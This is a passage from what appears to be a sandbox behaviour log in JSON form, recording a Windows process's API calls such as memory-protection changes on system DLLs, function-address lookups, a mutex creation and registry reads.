"0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 632 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowLongW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76649240" } ], "repeated": 0, "id": 633 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 634 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 635 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowThreadProcessId" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664b2e0" } ], "repeated": 0, "id": 636 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 637 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 638 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SendMessageCallbackW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650aa0" } ], "repeated": 0, "id": 639 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 640 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764fdce4", "parentcaller": "0x72ec5d4f", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x0000032c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 641 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 642 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "combase.dll" }, { "name": "ModuleHandle", "value": "0x75040000" }, { "name": "FunctionName", "value": "CoCreateGuid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75136270" } ], "repeated": 0, "id": 643 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 644 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771b81f9", "parentcaller": "0x738e0aad", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 645 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0073e000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 646 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0073f000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 647 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650c041", "parentcaller": "0x738f6801", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06190000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 648 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 649 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "" }, { "name": "Ordinal", "value": "2582" }, { "name": "FunctionAddress", "value": "0x76650cc0" } ], "repeated": 0, "id": 650 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 651 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7544f0f1", "parentcaller": "0x73149afa", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 652 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x73149b01", "parentcaller": "0x7314936a", "category": "misc", "api": "srand", "status": true, "return": "0x00000000", "arguments": [ { "name": "seed", "value": "0x67c10de7" } ], "repeated": 0, "id": 653 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x731497fd", "parentcaller": "0x73149525", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 654 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e0bbf", "parentcaller": "0x7315af22", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 655 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x73168e97", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 656 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x73168c04", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 657 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x73168ee9", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 658 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x73162a91", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 659 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x73168e44", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 660 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x7315971e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 661 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e15a7", "parentcaller": "0x7315ab4b", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x00000340" }, { "name": "MutexName", "value": "Local\\SM0:9224:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 662 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x7313d09d", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000340" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 663 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 664 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000344" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 665 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e254a", "parentcaller": "0x7315d11e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000344" } ], "repeated": 0, "id": 666 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764de6a0", "parentcaller": "0x7315d0ee", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000340" } ], "repeated": 1, "id": 667 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 668 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000344" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" } ], "repeated": 0, "id": 669 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000344" }, { "name": "ValueName", "value": "IsVailContainer" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\IsVailContainer" } ], "repeated": 0, "id": 670 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f46db", "parentcaller": "0x73161e66", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000344" } ], "repeated": 0, "id": 671 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 672 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000344" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Input" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Input" } ], "repeated": 0, "id": 673 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000344" }, { "name": "ValueName", "value": "ResyncResetTime" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Input\\ResyncResetTime" } ], "repeated": 0, "id": 674 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000344" }, { "name": "ValueName", "value": "MaxResyncAttempts" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Input\\MaxResyncAttempts" } ], "repeated": 0, "id": 675 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f46db", "parentcaller": "0x731496b1", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000344" } ], "repeated": 0, "id": 676 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 677 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 678 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00740000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 679 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 680 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 681 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 682 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 683 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 684 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 685 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 686 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 687 }, { "timestamp": "2025-02-27 23:34:15,972", 